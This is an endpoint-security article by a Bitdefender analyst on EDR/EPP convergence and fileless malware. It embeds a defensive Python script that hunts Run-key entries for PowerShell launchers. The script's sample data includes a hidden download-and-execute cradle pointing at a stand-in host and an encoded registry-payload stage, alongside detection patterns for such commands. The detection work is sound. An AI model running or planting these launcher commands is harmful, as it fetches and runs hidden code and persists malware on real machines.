The ever-changing security landscape, now dominated by advanced and sophisticated threats aimed at data exfiltration and cyber espionage, has spawned a new breed of technologies. These focus on endpoint detection and response (EDR) rather than on the antimalware and anti-spyware capabilities addressed by endpoint protection platforms (EPP). The combination of the two will set a new standard for security, building on the most widely used and trusted solutions available today.
Consequently, security companies have begun incorporating data protection and device management features into legacy EPP solutions, which in 2015 was an estimated $3.2 billion market. This change is an attempt to expand capabilities and tap into a market that has typically been segregated from traditional security. Conversely, EDR vendors have begun integrating endpoint protection technologies to keep up with the new functionality added by EPP vendors. The endpoint security continuum is focused on consolidating layered security so that defence-in-depth technologies can be applied to raise the overall security posture of the organisation. In turn, this integration will benefit companies not just in terms of security capabilities, but also in terms of visibility across hyperconverged infrastructures with both physical and virtual endpoints.
Traditional file-based malware, while still common, may no longer be a company's main concern. Companies are questioning whether signatures and heuristics that rely on pattern matching against files on disk can keep up, as fileless malware gains traction.
Traditional malware requires a file containing the malicious code to be written to disk and then executed. Fileless malware instead runs entirely in memory, leaving few or no artifacts on the local hard drive for a file scanner to inspect. Advanced and sophisticated threats built for cyber espionage or data exfiltration have started leveraging this technique because traditional EPP solutions lack memory introspection capabilities for live memory analysis.
These memory-based attacks leverage tools that are already installed, usually by default, such as PowerShell and Windows Management Instrumentation (WMI), so a legacy EPP sees only trusted, signed Microsoft binaries and raises no alarm. Some fileless attacks go further and store an encoded payload in the Windows registry, with a small launcher (typically an autorun entry) that reads, decodes and executes it in memory at every boot. This makes the attack persistent across reboots while remaining invisible to traditional EPPs; the registry hive is the one on-disk artifact such attacks leave, which is why autorun entries deserve scrutiny.
While some malware deployment techniques leverage zero-day vulnerabilities in commonly deployed applications such as Adobe Flash, browsers and Java, both file-based and fileless malware usually exploit known vulnerabilities that have not been patched, or arrive via spear-phishing emails with malicious attachments. The recent WannaCry and GoldenEye ransomware outbreaks proved that known vulnerabilities can still be leveraged successfully (both spread through the SMB flaw fixed by MS17-010, a patch Microsoft had shipped months earlier), as not all companies deploy security patches and updates in a timely manner. Whether because of legacy systems or backwards compatibility issues, organisations may be left open to advanced malware that exploits unpatched systems and services.
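The launcher pattern described above is visible in exactly the place a legacy file scanner ignores: the autorun value itself. The following Python hunt is an added example, not code from the article or from Bitdefender. It scans constructed Run-key entries, decodes any PowerShell -EncodedCommand blob (base64 over UTF-16LE, which is what powershell.exe expects), and flags entries that combine a hidden window, execution-policy bypass, a download cradle or a registry-stored payload with Invoke-Expression. The indicator names, the "Contoso" registry path and the example.invalid URL are assumptions made for the sample data.

```python
"""Hunt for fileless PowerShell launchers in autorun registry entries.

Added example (not from the article). All input below is constructed:
a few (key, value_name, command) tuples as an export of the Run keys
might contain, plus one benign vendor updater.
"""
import base64
import re

# Individually these switches appear in legitimate admin scripts; together they
# mark a launcher that hides itself and pulls its real payload from the
# registry or the network and runs it in memory without touching disk.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:in|indowstyle)?\s+hidden", re.I),
    "bypass_policy": re.compile(r"-e[a-z]*\s+bypass", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
    "registry_payload": re.compile(r"get-itemproperty\b.*\bhk(?:lm|cu)\b", re.I),
    "reflective_load": re.compile(r"\[reflection\.assembly\]::load|frombase64string", re.I),
}


def decode_encoded_command(command):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = INDICATORS["encoded_command"].search(command)
    if not m:
        return None
    try:
        # powershell.exe -enc takes base64 of the UTF-16LE encoded script.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_command(command):
    """Match indicators against the launcher and, if present, its decoded stage."""
    decoded = decode_encoded_command(command)
    hits = set()
    if decoded is not None:
        hits.add("encoded_command")
        # Blank the blob so base64 noise cannot accidentally match a word pattern,
        # then scan the launcher and the decoded second stage separately.
        launcher = INDICATORS["encoded_command"].sub("-enc <blob>", command)
        texts = [launcher, decoded]
    else:
        texts = [command]
    for text in texts:
        hits.update(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"indicators": sorted(hits), "decoded": decoded}


def is_fileless_launcher(indicators):
    """An encoded command alone is worth a look; otherwise require two indicators."""
    return "encoded_command" in indicators or len(indicators) >= 2


def hunt(entries):
    """Return the autorun entries that look like fileless launchers."""
    findings = []
    for key, name, command in entries:
        result = analyse_command(command)
        if is_fileless_launcher(result["indicators"]):
            findings.append({"key": key, "name": name, **result})
    return findings


# Constructed sample data. The second stage reads its payload back out of an
# (assumed) registry value and hands it to Invoke-Expression.
STAGE2 = "IEX ((Get-ItemProperty -Path 'HKCU:\\Software\\Contoso\\Cache').Blob)"
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode("ascii")

SAMPLE_RUN_KEYS = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDriveSync",
     f"powershell.exe -nop -w hidden -enc {ENCODED}"),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Updater",
     r'"C:\Program Files\Vendor\Updater.exe" /background'),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "HealthCheck",
     "powershell -ep bypass -w hidden -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://example.invalid/s')\""),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_RUN_KEYS):
        print(f"{f['key']}\\{f['name']}: {', '.join(f['indicators'])}")
        if f["decoded"]:
            print(f"  decoded stage: {f['decoded']}")
```

On a real host the tuples would come from exporting the Run, RunOnce and scheduled-task actions rather than being typed in, and the decoded stage is the thing to keep: it names the registry value holding the payload, which is the artifact a responder needs to collect before the machine is rebooted or cleaned.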
The current reality of endpoint security
Many organisations that run hybrid infrastructures or software-defined data centres (SDDC) face the near-impossible task of balancing various permutations of anti-virus solutions alongside EPP solutions and anti-exploit technologies. While this is a valiant effort to address all attack vectors, deploying individual technologies from various vendors often means running multiple security agents, which hurts performance, and juggling multiple consoles, which hurts management efficiency.
While the total cost of ownership might look lower on paper, in practice the performance hit and the running costs usually make these implementations cumbersome, creating more problems for IT managers than they solve.
The intricacies of malware intrusions cannot be resolved simply by deploying disparate EDR and EPP solutions side by side, as that only causes performance and management issues. Two outcomes are likely: either the EDR and EPP markets bifurcate into light and heavy deployments of the technologies, or they converge into a NextGen EPP offering hardening and control, pre-execution detection, post-execution detection, automated response and visibility, all under a single unified agent.
EDR and EPP fragmentation will likely drive the evolution of a NextGen EPP solution that can predict, prevent, detect and respond to advanced malware. Combined with NextGen security tools, this will enable enterprises of all sizes to safeguard the entire spectrum of attack vectors. With locally deployed machine learning models for detecting hacking tools, suspicious files and advanced threats, NextGen EPP solutions also support sandboxing and security analytics that help security administrators understand a suspicious chain of events and give them the context needed to trace the root cause of an advanced attack before it becomes a breach.
While sandboxing is sometimes sold as a stand-alone product, NextGen EPPs will include it as an advanced security control that detonates suspicious files and performs in-depth dynamic analysis of their behaviour before they are allowed to run on the machine. This is particularly useful because even fileless malware based on PowerShell scripts can be detonated and analysed before being executed locally, provided the script is intercepted before it runs.
Fortifying the security posture of an organisation will become a lot easier as visibility into stealthy attacks and abnormal system and application behaviour is centralised in a single management console, offering single-pane-of-glass visibility into the overall security status of the entire infrastructure.
Detection capabilities that combine advanced threat detection with threat intelligence and actionable indicators of compromise will enable IT administrators not only to reduce the complexity and cost of operations, but also to defend effectively against advanced threats.
With threat forensics and aggressive detection capabilities converging with EDR and traditional EPP technologies, NextGen endpoint platforms will be uniquely suited to augment an organisation's security posture without sacrificing performance or unbalancing security budgets.
What makes NextGen endpoint platforms unique is their ability to focus on detection and remediation without sacrificing prevention, something that EDR and EPP solutions cannot accomplish alone. The convergence of these capabilities will not only offer added value for organisations, but will also change the way we look at security.
With a single implementation that has all the necessary tools to prevent malware from affecting endpoints, organisations will also have the security controls that allow for application monitoring, as well as the detection and response capabilities necessary for finding and removing advanced threats. Countering the dynamic and diverse capabilities of cybercriminals will become a lot easier with converged endpoint security solutions, and protecting corporate assets will become a seamless experience thanks, in part, to unified management consoles that offer single-pane-of-glass visibility across hybrid infrastructures.
Liviu Arsene, senior e-threat analyst, Bitdefender